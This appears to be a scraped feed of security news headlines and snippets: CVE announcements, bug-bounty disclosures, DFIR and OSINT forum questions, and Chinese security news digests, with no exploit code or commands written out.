    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0
  • Open

    CVE-2022-25312: An XML external entity (XXE) injection vulnerability exists I
    Article URL: https://lists.apache.org/list?announce@apache.org:2022-3 Comments URL: https://news.ycombinator.com/item?id=30577267 Points: 3 # Comments: 0
  • Open

    The (Mis)Use of Artifact Categories, pt II
    My previous post on this topic presented my thoughts on how the concept of "artifact categories" were being misused. My engagement with artifact categories goes back to 2013, when Corey Harrell implemented his thoughts on categories via auto_rip. I saw, and continue to see, the value in identifying artifact categories, but as I alluded to in my previous post, it really seems that the categories are being misused. Where the artifacts should be viewed as providing an indication of the categories and requiring further analysis (including, but not limited to the population of artifact constellations), instead, the artifacts are often misinterpreted as being emphatic statements of the event or condition occurring. For example, while an entry in the ShimCache or AmCache.hve file should indicate …
    DFIR Reporting
    A request that's been pretty consistent within the industry over time has had to do with reporting. I'd see a request, some responses, someone might ask for a template, and then the exchange would die off...I assumed that it had moved to DMs or offline. Then you'd see the discussion pop up again later, in some other forum. I get it...writing is hard. I have the benefit of having had to write throughout my career, but also of putting intentional, dedicated effort into DFIR reporting, in that I had been very purposeful in seeking feedback from my boss, and incorporating that feedback into report writing. I was able to get to the point of having reports approved with minimal (if any) changes pretty quickly.  As a result, in 2014, Windows Forensic Analysis Toolkit 4/e was published, and in thi…
  • Open

    PSA: reddit appears to be removing posts/comments containing *.ru URLs
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Big Collection of 720p Movies, solid speeds, haven't explored all the directories, so I'm marking NSFW just in case.
    submitted by /u/SatansMoisture [link] [comments]
    Classic TV: Various video qualities, decent speeds
    submitted by /u/SatansMoisture [link] [comments]
  • Open

    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.
  • Open

    A Detailed Guide on Wfuzz
    Introduction Many tools have been developed that create an HTTP request and allow a user to modify their contents. Fuzzing works the same way. A The post A Detailed Guide on Wfuzz appeared first on Hacking Articles.
  • Open

    webOS Revisited - Even More Mistaken Identities · The Recurity Lablog
    submitted by /u/addelindh [link] [comments]
  • Open

    Question about protecting my data while traveling .
    Traveling a lot this week and was just wondering what kind of vpn you guys use while traveling and any other security measures you may have :) submitted by /u/Savage-shredder [link] [comments]
    Good US based infosec recruiters?
    I never thought I would say this, normally being on the hiring side, but has anyone had positive experience for US-based boutique infosec recruiters that they would recommend? I’ve found several listed in CISO magazine and such but don’t know if any are particularly clue-full. Public or DM is fine, thanks! submitted by /u/venerable4bede [link] [comments]
  • Open

    Cloudflare WAF bypass via Origin IP
    Cloudflare supports more than 16 million Internet attributes and is now one of the most popular WAFs(Web Application Firewalls). A year… Continue reading on Medium »
    Bug Bounty: Open Xmlrpc.php vulnerability on WordPress site.
    what is Xml-RPC? Continue reading on Medium »
  • Open

    SecWiki News 2022-03-05 Review
    高效挖掘反序列化漏洞——GadgetInspector改造 by ourren js安全之ast混淆 by ourren 基于openresty的安全网关开发记录 by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-03-05 Review
    高效挖掘反序列化漏洞——GadgetInspector改造 by ourren js安全之ast混淆 by ourren 基于openresty的安全网关开发记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    How to collect a forensic image of a VSXI/EXSI that has been infected with ransomware?
    How to collect a forensic image of a VSXI/EXSI that has been infected with ransomware? submitted by /u/rvndomus3r2019 [link] [comments]
    Copying Hard Drive
    I am sending a hard drive I own into Cyber Forensics. If possible, I am looking for software advice to copy the hard drive before sending it in to experts. Additionally, if you have advice for transferring the files from the software to a type of hardware, I would appreciate it. ​ Thanks. submitted by /u/Odd-Switch-1658 [link] [comments]
  • Open

    UK’s vulnerability to corruption uncovered amid slow sanctions response
    Article URL: https://www.theguardian.com/commentisfree/2022/mar/05/uks-vulnerability-to-corruption-uncovered-amid-slow-sanctions-response Comments URL: https://news.ycombinator.com/item?id=30566774 Points: 9 # Comments: 0
  • Open

    Plugins for Persistence (Sublime Text & VS Code)
    submitted by /u/hanbei-undying [link] [comments]
  • Open

    unclaimed subdomain special.rkeeper.ru to takeover from tilda.cc
    Mail.ru disclosed a bug submitted by mainteemoforfun: https://hackerone.com/reports/1045644
  • Open

    FreeBuf早报 | 英伟达71000名员工凭证泄露 ;政协委员建议设立网络安全和数据保护窗口
    英伟达发布了一份报告,承认攻击者从其系统中窃取了员工密码和未披露的英伟达专有信息。
  • Open

    Expat library: libexpat 2.4.7 (CVE fixes)
    Article URL: https://github.com/libexpat/libexpat/blob/R_2_4_7/expat/Changes Comments URL: https://news.ycombinator.com/item?id=30564782 Points: 1 # Comments: 0
  • Open

    Açık kaynak istihbaratı : Fotoğraflardan ne buluruz?
    Tryhackme: Searchlight — IMINT — Part 2 Continue reading on Medium »

  • Open

    Misinformation, Disinformation and Subterfuge, Part One:
    How I triggered a weaponized Fake-Left Troll Farm meant to harass, target, defame and deplatform prominent Disinformation researchers. Continue reading on Medium »
    Maltego Basics: Building a Network Diagram
    This post is a step-by-step guide to create a network diagram in Maltego. Continue reading on Medium »
    The OSINT Toolkit!
    Baidu Maps http://map.baidu.com/ Continue reading on System Weakness »
    OSINT: Preso “influencer” digital após ser identificado fazendo dancinhas
    Imagina estar fazendo sua dancinha trend no TikoTeko e ser preso logo após? Pois foi o que aconteceu. Continue reading on Medium »
  • Open

    The perils of the “real” client IP [or the many ways to use X-Forwarded-For for incorrectly]
    submitted by /u/yesyoucantrip [link] [comments]
    A Backdoor Lockpick : Reversing Phicomm’s Backdoor Protocols
    submitted by /u/stargravy [link] [comments]
    Hacking Hadoukens: Reverse Engineering a Street Fighter Two Cabinet
    submitted by /u/wrongbaud [link] [comments]
    ICS & OT Risk and Vulnerability Report
    submitted by /u/h4ck3dit [link] [comments]
    Finding an Authorization Bypass on my Own Website - SQL Injection in a Parameterized Query
    submitted by /u/mdulin2 [link] [comments]
    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    submitted by /u/YuvalAvra [link] [comments]
  • Open

    Normal User is able to EXPORT Feature Usage Statistics
    Lark Technologies disclosed a bug submitted by aishkendle: https://hackerone.com/reports/1470076 - Bounty: $500
    Brute force attack of current password on login page by bypassing account limit using IP rotator(https://dashboard.omise.co/signin)
    Omise disclosed a bug submitted by sachinrajput: https://hackerone.com/reports/1466967
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Fuzzing unsafe code in a Rust crate
    Nearly all Rust code is memory-safe. A necessary part of using Rust is to use the wide ecosystem of third-party Rust crates. These are… Continue reading on Medium »
  • Open

    Does bluetooth create a vulnerability for the broadcasting device itself?
    I see how bluetooth is a vulnerability to the data that's being transferred over the connection but does it pose an actual threat to, lets say, a phone's internal data? Or are they just going to be able to listen along to my music? submitted by /u/zeff_05 [link] [comments]
    Airbnb Donations
    Does Airbnb have a robust enough infosec team to prevent Russian hackers from registering fake properties in the Ukraine to take advantage of all the people in America lazy enough to only donate to Ukrainians bthrough reserving Airbnb's? submitted by /u/intentropy [link] [comments]
    Why would an inbound email from a 3rd party have an IP internal to our org in the SPF record?
    I'm looking at an email that was suspected as a phish and for the most part it's fairly benign but there's a few areas in the headers that don't add up for me. The call to action in the email was to update some Site-to-Site VPN addresses to US Bank. Important to note that we don't currently have anything like that established with them, though the support numbers appear to be official and I just don't clearly see where the hook here is yet. The part that confuses me most is that the sender IP listed as the first SPF record is our public NAT address for client VPNs and not even one of our mail servers. The headers do refer to one of our mail servers further down, however it's the wrong IP. I'm new to the org though so may not have all the pieces to the puzzle. Are there simple explanations…
    Utilization - Does Your Organization Care? Do Your Employees Like it in InfoSec?
    Hey Everyone. Moderating this Subreddit throughout the past 6 or so months I have seen the topic come up quite a bit regarding utilization. While Metrics need to be gathered to determine whether an employee does their job or not, having baselines often causes stress, unrealistic expectations, and caveats that often cause issues with this requirement (IE Training on common security topics/trends/New Threat Landscapes) As far as I know, having a growth mindset and focusing on metrics related to security inside the organization is the way to go, and not micromanaging employees on the numbers each one of them push out. I'd be interested to hear others and their thoughts on this, and how it relates to your employees and organization. submitted by /u/Envyforme [link] [comments]
    Dealing with impostor syndrome?
    Leaving it kinda brief, I have around 6 years in Security starting off as a QA and deployment engineer, and later moving on to partners and doing what I consider architecture. Most of my background is focused on SIEM. Scoping out deployments, talking to clients about what to log and understanding their requirements and how to change/modify their environments to match our services offerings etc. Anyway I took a "Security Architect" role at a big 5 firm and definitely realized I'm under prepared. What can I do to make sure I don't get fired? I didn't entirely oversell myself and I was totally open about my experience, I just feeling way overwhelmed with the level everyone else in my group is at. submitted by /u/Kirin-Jack [link] [comments]
    Should I learn gdb or GNU debugger? If yes, then why?
    Idk what to write submitted by /u/The_Intellectualist [link] [comments]
    Software Developer Administrative Rights
    What is everyone else doing to effectively control (remove) the use of administrative rights on workstations development team members use? We’ve pulled local admin rights from general employees years ago without much issue but every time we approach our dev teams to do it it’s just impossible as it too extremely inhibits their work as they legitimately need to do config management for locally installed services (eg IIS) and maybe less legitimately installing “development tools”. I’d add, we do have pro, qa, dev, sandbox environments but the devs still choose to do development on their desktop systems for “performance” reasons which there is some truth to as we give them beefy hardware (tons of ram/top end CPUs). Edit: after some good dialog here seems like common perspective is to put them in an isolated environment such as a VM. Thanks everyone for the discussion. Still monitoring this so chime in with any other thoughts/experience. submitted by /u/clayjk [link] [comments]
    Nvidia Breach
    It looks like there are two certificates now compromised as a result of the Nvidia breach. What if anything should organisations be doing to protect themselves? submitted by /u/annonuk2020 [link] [comments]
  • Open

    CVE-2021-4128: PfSense 2.5.2 Shell Upload
    Article URL: https://packetstormsecurity.com/files/166208/pfSense-2.5.2-Shell-Upload.html Comments URL: https://news.ycombinator.com/item?id=30557143 Points: 10 # Comments: 0
  • Open

    SecWiki News 2022-03-04 Review
    Mnemosyne:一个高效的水坑攻击调查取证系统 by ourren GoDLP: 敏感信息保护系统 by ourren Make JDBC Attacks Brilliant Again 番外篇 by ourren Attack Flow — Beyond Atomic Behaviors by ourren 更多最新文章,请访问SecWiki
    SecWiki News 2022-03-04 Review
    Mnemosyne:一个高效的水坑攻击调查取证系统 by ourren GoDLP: 敏感信息保护系统 by ourren Make JDBC Attacks Brilliant Again 番外篇 by ourren Attack Flow — Beyond Atomic Behaviors by ourren 更多最新文章,请访问SecWiki
  • Open

    New Linux vulnerability affecting cgroups: can containers escape?
    Article URL: https://unit42.paloaltonetworks.com/cve-2022-0492-cgroups/ Comments URL: https://news.ycombinator.com/item?id=30556188 Points: 91 # Comments: 58
  • Open

    steps to run before analyzing the iphone image
    steps to run before forensic analyze: turn off screenlock, turn off backup, turn off find my iphone, what else? submitted by /u/cyberfo [link] [comments]
    Career Advice
    I've been working in eDiscovery and forensics for about three years, mostly lit support and low-level investigations. I hold CFCE and CCE certs. Currently enrolled in Champlain and I'll be wrapping up my B.S. in Computer Forensics and Digital Investigations. I'm located in an HCOL area and thinking of transitioning to a different company due to pay disparity. IR is in greater demand, so I imagine I'll be able to leverage more money in that field. What steps (training, certs, etc.) should I take to prepare myself if I decide to change my focus to DFIR? submitted by /u/stickyricky714 [link] [comments]
    Trying to MFTExplorer but it returns an error. Any way to circumvent this?
    submitted by /u/KTthemajicgoat [link] [comments]
    Interesting
    submitted by /u/kramps_ [link] [comments]
  • Open

    PORTSWIGGER WEB SECURITY - WEBSOCKETS LAB ÇÖZÜMLERİ
    WebSocket, client ile server arasında veri aktarımını sağlayan çift yönlü ve modern web uygulamalarında yaygın olarak kullanılan HTTP gibi… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CLICKJACKING LAB ÇÖZÜMLERİ
    Clickjacking, saldırgan tarafından web uygulamasında barındırılan zararlı bir bağlantıya, hedef kullanıcının tıklaması sonucunda çeşitli… Continue reading on Medium »
    PORTSWIGGER WEB SECURITY - CORS (CROSS-ORIGIN RESOURCE SHARING) LAB ÇÖZÜMLERİ
    CORS (Cross-Origin Resource Sharing / Kökenler Arası Kaynak Paylaşımı), belli bir domainin dışındaki kaynaklara kontrollü erişim sağlayan… Continue reading on Medium »
    Gold Bug Bounty Resources | Web Application, Android & iOS Security
    Take your time and start learning from these Resources. Continue reading on Medium »
    The Secret trick for subdomain Enumeration
    Probably the most covered topic in bug bounty hunting and web apps is subdomain enumeration. Continue reading on Medium »
    Bug Bounty Toolkit
    Bug bounty platforms and programs Continue reading on System Weakness »
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    [Day 9] Networking Where Is All This Data Going | Advent of Cyber 3 (2021)
    No content preview
    HTML Injection via user agent leads to website distortion revealing backend code.
    No content preview
  • Open

    FreeBuf周报 | 英伟达多达1TB数据被盗;丰田因供应商遭受网络攻击而停产
    总结推荐本周的热点资讯、优质文章和省心工具,保证大家不错过本周的每一个重点!
    Avast 为袭击乌克兰的HermeticRansom发布了免费解密工具
    近日,Avast发布了免费的HermeticRansom勒索软件解密工具,只为帮助遭受勒索威胁的乌克兰受害者恢复数据。
    论一次在简单的渗透测试
    一次简单渗透测试的总结
    国家网信办发布《互联网弹窗信息推送服务管理规定(征求意见稿)》
    《规定》明确指出,在我国境内提供操作系统、终端设备、应用软件、网站等服务的,开展互联网弹窗信息推送服务时应当遵守本规定。

  • Open

    Computer workstation question
    Hello everyone, I know this has been asked before however I’m going to build a forensics workstation for my department; we don’t have a lot of money to throw around to do a dual CPU set up. I was wondering if anyone would recommend the newest I9-12900k CPU for processing, or any other processor for the most efficient in imaging. I mainly use Magnet Axiom and cellabrite. One thing I’m having trouble with is finding a good MOBO, what would you all recommend, I need enough ports for a write blocker and multiple HDDS, and M.2 SSD’s. Thanks submitted by /u/ExiisTT [link] [comments]
    Microsoft Surface Go 2 - Bitlocked and Paladin
    Good day, all! I am working with a MS Surface Go 2. I have/had the PIN to access the device. I I did obtain a memory capture and logical image of the C: drive using FTKi. After obtaining that data, I tried to boot into Paladin but it would not load/boot. I went into the UEFI and disabled the Secure Boot option, knowing this may cause the device to become bitlocked - which it did, but did allow Paladin to boot. As I do 99% phones, this one is throwing me for a loop and I am seeking some guidance. I am now able to image the drive using Paladin, but obviously it will be bitlocked. The recovery key "should" be captured in the RAM, right? And if so, how do I decrypt the data once loaded (or before). I would be using Axiom to load the data. Thanks in advance for any insights and help! submitted by /u/Responsible_Dig_2899 [link] [comments]
    Executed files
    Hi how can I investigate executed malicious file like maldoc or any execruable. How to get the list of artificates? Thanks submitted by /u/0X900 [link] [comments]
    Cellebrite UFED file system extraction
    Does Cellebrite support file system extraction for deleted file? if yes, do we need to root the iphone or Android phone for data extraction? submitted by /u/cyberfo [link] [comments]
    Computer Evidence RecoveryThe Truth About USB Device Serial Numbers – (and the lies your tools tell) - Computer Evidence Recovery
    Quote from article: What we have then discovered, is that in most cases, external portable devices are not properly reported in Windows, at least insofar as what regards a Serial Number. This becomes incredibly problematic when your forensic reports says that the device serial number is “ABCD”, and an opposing expert says it is “EFGH”. Who is right? It is tough to convince a court that your tool is right and the label from the manufacturer is wrong. Are you examining a plastic container? Or are you examining a hard drive? What you do matters. Lives are affected by the work of digital forensics practitioners. https://www.computerpi.com/the-truth-about-usb-device-serial-numbers-and-the-lies-your-tools-tell/ submitted by /u/Erminger [link] [comments]
    detect data exfiltration to USB
    How to detect data exfiltration to external USB drive through $MFT, thanks submitted by /u/cyberfo [link] [comments]
  • Open

    Analysing 3177 organisations to track the 10 most popular email spam and malware filters
    submitted by /u/Jumpy_Resolution3089 [link] [comments]
    SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store
    submitted by /u/Goovscoov [link] [comments]
    A Closer Look at the Russian Actors Targeting Organizations in Ukraine
    submitted by /u/CyberMasterV [link] [comments]
    Bypassing Google's Cloud Armor firewall with an 8 KB request
    submitted by /u/almostfamous [link] [comments]
  • Open

    OSINT: Corporate Recon — HTB Academy Walkthrough
    INTRODUCTION: Continue reading on Medium »
    OSINT meydan okumaki
    Tryhackme: Searchlight — IMINT Continue reading on Medium »
    Shodan Dorks — Tras CVE´s , Fotos y Controladores de Tanques de Gasolineras.
    Cualquier amante de la ciberseguridad conoce el motor de búsqueda Shodan, pero ¿sabrías utilizar los parámetros adecuados para “Dorkear… Continue reading on Medium »
    Un apasionado de la ciberseguridad y ciberinteligencia con muchas cosas que contarte.
    ¿Are u re4dy? Continue reading on Medium »
    OSINT ON GMAIL ACCOUNTS
    Google Hunt Tool Continue reading on System Weakness »
    Metagoofil
    (LET’S EXPOLRE HIDDEN FILES) Continue reading on Medium »
  • Open

    Ukrayna’nın Siber Savunması Hacken’ın Rolü: Dyma Budorin ile En Son AMA
    Hacken ekibi kısa süre önce, Rusya’nın Ukrayna’yı işgalinin başlangıcından bu yana CEO’muz Dyma Budorin ile ilk AMA oturumunu düzenledi… Continue reading on Medium »
    Host Header Injection Leads To Pre-Account Takeover Worth 100$
    Self Introduction : Continue reading on Medium »
    Weakly Typed SQL Injection
    Programming languages come in two categories: Hard/Strong Typed Soft/Weak Typed Continue reading on Techiepedia »
    An Clickjacking - Which Rewarded me with 275$
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Found API Token on js file
    Continue reading on Medium »
  • Open

    Uber Test Report 20220301
    Uber disclosed a bug submitted by johnzilla313: https://hackerone.com/reports/1496297
    Subdomain Takeover at https://new.rubyonrails.org/
    Ruby on Rails disclosed a bug submitted by nagli: https://hackerone.com/reports/1429148
    stand.pw.mail.ru xss
    Mail.ru disclosed a bug submitted by smallyu: https://hackerone.com/reports/1400197
  • Open

    (1st post) Atari FTP Archive : Atari/8bit/demoscene related material since 2002. 845GB in 938689 files
    submitted by /u/Pablouchka [link] [comments]
    Bald Actors
    https://www.baldactors.com/wp-content/uploads/2016/03/ submitted by /u/SnooObjections8515 [link] [comments]
    Was searching funnies...
    Seems like my post has been deleted again... Why not just take out the links that offend... Personal info is not personal if it is on the web... So Here is some funny... http://www.p14nd4.com/ars/ Starts here... http://www.thedevilsdue.us http://www.thedevilsdue.us/!.Music/AllMusic/!.DW.80GB/My%20Music/ music http://alliza.iptime.org/mobile/%c8%a8%c6%fa%b4%f5/%c1%c1%c0%ba%c0%da%b7%e1%bd%c7/%c0%bd%be%c7%c0%da%b7%e1%bd%c7/ http://iama.stupid.cow.org/Audio/ https://video.donaldandcheryl.net/Funny/ ​ https://simpsons.porn/assets/images/ ​ http://edmazur.com/images/funny/ ​ http://fricking.ninja/Media/photo_comments/mp4/ ​ http://www.kyudan.com/funny/Corel%20Auto-Preserve/ http://www.kyudan.com/funny/img/ ​ images... https://alt-tab.org/data/images/ submitted by /u/xanderTgreat [link] [comments]
    Printable Origami Paper Directory
    https://www.origamiway.com/printable-origami-paper/ submitted by /u/shaburushaburu [link] [comments]
  • Open

    Chrome 100 Beta: Reduced User-Agent Strings, Multi-Screen Window Placement, and More
    Unless otherwise noted, changes described below apply to the newest Chrome beta channel release for Android, Chrome OS, Linux, macOS, and Windows. Learn more about the features listed here through the provided links or from the list on ChromeStatus.com. Chrome 100 is beta as of March 3. 2022. You can download the latest on Google.com for desktop or on Google Play Store on Android. Last Version for Unreduced User-Agent String Chromium 100 will be the last version to support an unreduced User-Agent string by default (as well as the related navigator.userAgent, navigator.appVersion, and navigator.platform DOM APIs). The origin trial that allowed sites to test the fully reduced User-Agent will end on April 19, 2022. After that date, the User-Agent String will be gradually reduced. To review …
  • Open

    【安全通报】Spring Cloud Gateway 远程代码执行漏洞风险通...
    近日,Spring官方发布了关于Spring Cloud Gateway的CVE报告,其中包含Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)。攻击者可通过该漏洞恶意创建允...
  • Open

    【安全通报】Spring Cloud Gateway 远程代码执行漏洞风险通...
    近日,Spring官方发布了关于Spring Cloud Gateway的CVE报告,其中包含Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)。攻击者可通过该漏洞恶意创建允...
  • Open

    A Case Study: Defending against ransomware with Microsoft Defender for Endpoint and Intel TDT
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape?
    CVE-2022-0492 is the third recent kernel vulnerability that allows malicious containers to escape. We offer root cause analysis and mitigations. The post New Linux Vulnerability CVE-2022-0492 Affecting Cgroups: Can Containers Escape? appeared first on Unit42.
  • Open

    My computer keeps saying "network certificate not valid" or something like that, whenever I go to reddit, download libraries with gradle, basically anything at all. Am I under attack?
    SWE but no idea why I keep getting a red message in chrome when i try to go to websites i normally go to submitted by /u/oaxac9 [link] [comments]
    How can one protect oneself in case some devices of one's family get infected?
    One of my family has been complaining about her phone being always laggy. Which shouldn't happen because she uses a relatively new device? Well, there is also a possibility that she doesn't kill background possesses. But lately, I have been noticing the network becomes really laggy (supposedly it's not because of Ukraine?), and sometimes it just completely shut down/disconnects. Since we share the same wifi, are there any things I can do? Something to suggest to her, or for me to avoid getting infected, just in case. Thank you in advance! edit: I'm not sure if I should also include this but. I have a windows tablet and a Linux desktop that connects to the router through ethernet all the time. To be honest, I am not even sure if it can effect me in anyway, since I'm not educated at all in cybersecurity. Hopefully I'm just paranoid? Just to be sure haha, sorry for random posting. submitted by /u/manho1e [link] [comments]
    Where can I check if a website downloaded a force file?
    I mean if the websited forced a download of a file, sorry, no force thing. I noticed today that my hosts file was modified and was 127.0.0.1 suspiciousaddress. I checked the address on web scanners and said clean but that it had an ascii file, small, 170 characters, maybe a script? I by mistake put the address on google and the browser tried to open it, I closed it and my internet crashed as soon as I did that so now I'm worried. I also tried to enter using the ip and not the dns and got a message but didnt wrote it down. I'd like to check if the website is downloading something on my pc, some script etc, or what else can I do? ​ Thanks in advance. submitted by /u/HeroOfTheNorthF [link] [comments]
    Malware implication if I run VM via gnome boxes?
    I would like to check if malware could affect my main system (Silverblue), if I run windows or other linux distro via gnome boxes - could malware get into main os? If it could get affected, then would having amnesic help? I was reading how in some cases paging/ram could get copied into hard disk. So not sure. submitted by /u/AtomicFurion [link] [comments]
    What's your favourite Sandbox ?
    Hi guys, I'm going to build a simple home lab on a budget . Need recommendations regarding easy to deploy sandbox. What's your favorite sandbox and why? submitted by /u/breadcrumb2000 [link] [comments]
  • Open

    SecWiki News 2022-03-03 Review
    从网络空间认知战到对俄大规模网络致瘫攻击 by ourren 移动GS3101光猫分析 —— 狸猫换太子 by ourren 跟着三梦学Java安全:半自动挖洞 by ourren TA402 针对中东目标持续发起攻击 by Avenger 更多最新文章,请访问SecWiki
    SecWiki News 2022-03-03 Review
    从网络空间认知战到对俄大规模网络致瘫攻击 by ourren 移动GS3101光猫分析 —— 狸猫换太子 by ourren 跟着三梦学Java安全:半自动挖洞 by ourren TA402 针对中东目标持续发起攻击 by Avenger 更多最新文章,请访问SecWiki
  • Open

    Manipulating User Passwords Without Mimikatz
    There are two common reasons you may want to change a user’s password during a penetration test: You have their NT hash but not their plaintext password. Changing their password to a known plaintext value can allow you to access services in which Pass-the-Hash is not an option. You don’t have their NT hash or... The post Manipulating User Passwords Without Mimikatz appeared first on TrustedSec.
  • Open

    FreeBuf早报 | 开源 PJSIP 库受到关键漏洞影响 ;工信部公布规定限制 APP 下载行为
    在俄乌冲突升级背景下,美国参议院选择一致通过《加强美国网络安全法》。
    如何预防钓鱼邮件?SMIME邮件安全证书来支招!
    网络钓鱼(Phishing,与钓鱼的英语fishing发音相近,又名钓鱼式攻击),通过冒充银行或其他知名机构向受害者发送欺骗性邮件,引诱收信人提供自己的敏感信息(如用户名、口令、ATM交易密码或
    风险上升!数据泄露和影子资产致企业网络攻击面扩大
    数据泄漏和影子资产是全球大型组织面临网络攻击的最大来源。
    游戏玩家注意了!黑客正传播可劫持社交媒体账户的恶意软件
    它主要通过微软的应用商店以计算机木马游戏应用程序的形式入侵。
    俄罗斯认为对其卫星发动网络攻击是战争行为,但入侵乌克兰不算
    隶属于匿名者的黑客组织宣布关闭俄罗斯航天局的控制中心。
    网络战发展成“第五战场”,这些数据告诉你乌克兰的网络现状
    俄罗斯总统普京宣布在乌克兰东部的顿巴斯地区进行特别军事行动。除了现实热战争以外,俄罗斯-乌克兰之间的“网络战”其实早已拉开序幕。
    MITRE对手交战框架V1及一系列落地指导文件发布
    给积极防御人员的对手交战指导建议
    CIS 2021大会·春日版启动线下录制,阳春相聚话安全
    3月2日上午,为期两天的「CIS 2021网络安全创新大会Spring·春日版」在上海宝华万豪酒店开启线下录制。
    新招数!BO彩平台支付通道新趋势,虚拟货币成“新宠”
    虚拟货币已成为BO彩平台充值、提现通道的“宠儿”,原先占主要地位的微信、支付宝等第三方充值方式,在某些BO彩平台逐渐销声匿迹。
    HTTP和HTTPS,六大常见问题
    有人对于HTTP和HTTPS,发出了疑问,小编收集了几个常见的问题,为您解答,希望在最大程度上帮助到您,让您更深层次了解HTTP与HTTPS。
    APT29 以疫情为话题攻击大使馆相关人员
    最近,APT29 又转换了攻击目标,将视线从SloarWinds转移到了大使馆。
    模块化银行木马IcedID 新变种浮出水面
    IcedID 是最早在 2017 年被披露的模块化银行木马,也是近年来最流行的恶意软件家族之一。
    干货 | 金融行业共享数据错综复杂,如何强化数据安全根基?
    数据分类分级能够有效促进金融数据在机构间、行业内的安全共享,有利于金融行业数据价值的挖掘与实现。

  • Open

    IDOR delete any Tickets on ads.tiktok.com
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1475520 - Bounty: $5000
    Open Redirect TO Stealing aadvid
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1378533 - Bounty: $500
    Reflected XSS on www.pornhub.com and www.pornhubpremium.com
    Pornhub disclosed a bug submitted by wh0ru: https://hackerone.com/reports/1354161 - Bounty: $750
  • Open

    4300$ Instagram IDOR Bug (2022)
    Hello everyone! Today im going to explain how i found a 4300$ IDOR Bug on Instagram. Continue reading on Medium »
    My personal favourite top 20 hacking tools.
    1. Nmap (Network Mapper) Continue reading on Medium »
    What is the John The Riper(JTR)? How to use JTR?
    What is the John The Riper? Continue reading on Medium »
    How did I find Directory Traversal attack using GitHub
    Hello, Continue reading on Medium »
    Bug Bounty — How to approach Vulnerabilities ( PART 1 )
    Hello people, it’s me again. In most cases, with automated tools, you can possibly find low level security bugs i.e most likely Blind XSS… Continue reading on Medium »
    IDOR in support.mozilla.org through Code Review
    I was trying to improve my static analysis code, specifically django apps, so i decided to hack a random project in github. And i found… Continue reading on Medium »
    Community Newsletter — March 2022
    As the Pandora community continues to grow stronger with each passing day, we would like to take this opportunity to thank everyone for… Continue reading on Pandora Protocol »
    Do data practitioners are the new (security) weakest link?
    Secrets in code Continue reading on CodeX »
    Business Logic Bug| Email Existing Bypass | Running 2 accounts with a single email
    Vulnerability Category: Business Logic Error Continue reading on Medium »
    Find bugs by Google dork method
    Cre : https://medium.com/@fcwdbrqmr/400-bounty-again-using-google-dorks-6dc8e438f017 Continue reading on Medium »
  • Open

    Could artifacts be missing from Magnet Axiom?
    Hi there, hoping some of you are Magnet Axiom users and may be able to help me with this conundrum I have *some nonessential information has been altered for protection*: I have received a Portable Case from someone who has full license to the platform. I understand how the Portable Case is created (via watching the Magnet tutorial videos). The Portable Case is supposed to contain the contents of John Doe's cell phone. Separately, I have Snapchat Returns for John Doe's Snapchat account, and as far as is known John Doe only owned the one aforementioned cell phone. In looking at the Artifacts in the Portable Case, there seem to be things missing. For example: The Portable Case is supposed to cover a time period of 01/01/2XXX through 05/15/2XXX. When comparing the Snapchat Returns > Snapchat Memories I am able to see a specific video file - I'll call it "Selfie A" - from 02/03/2XXX 08-48-56 UTC. But when looking at the Portable Case > CHAT > Snapchat Memories artifacts there is no corresponding artifact. There are other video artifacts from that same date and around that time, but not "Selfie A." There are many files I have identified with this same issue. So now the question: I will admit I have not had formal training on Axiom (nor am I a digital forensics professional by trade) so I am willing to withhold suspicion for now, but, is it possible that artifacts could appear from Snapchat Returns that were missed in Axiom? Maybe "Selfie A" was deleted from the phone so it doesn't appear in Axiom but it does appear in the Returns data from Snapchat? (I hate even typing that question because I know even "deleted" things can be forensically recovered but go with me here). Or, is it more likely that the "Selfie A" artifact is visible in the Snapchat Returns but not in the Portable Case because the creator of said Portable Case chose not to include the artifact? submitted by /u/mclaughlinkessell [link] [comments]
    Tips on the GDAT certification (SEC599)
    Hi all, I have just enrolled for the SEC599 (OnDemand) and will be going through the GDAT exam as well. Are there any tips which could help me prepare better and pass the exam? My intro - Have been into SOC and IR for 5+ years now, and this is going to be my first certification submitted by /u/Suchi-Bee [link] [comments]
    Pagefile/ Cache question
    Hey Guys I work in law and as you probably have experienced we are stunningly ignorant on computer forensics. When I have a bit of time I like to research various computer forensic things and evidence from browsers are quite fascinating to me. I have two questions that I'd love help answering. 1) I'm assuming that this is a stupid/ basic question but I read that pictures in the cache are copies of the original essentially and as such they would contain meta data like locations and so on, is that also correct for stuff in the pagefile? 2) I've messed around with the belkasoft software trail run to view the pagefile on my PC, the categories that the data is broken up into is fairly understandable browsers, instant messengers. And they contain images and urls. However there is a category called other files and I'm not sure what is contained in them? submitted by /u/curiousstudent99l [link] [comments]
  • Open

    Thought this might be of interest
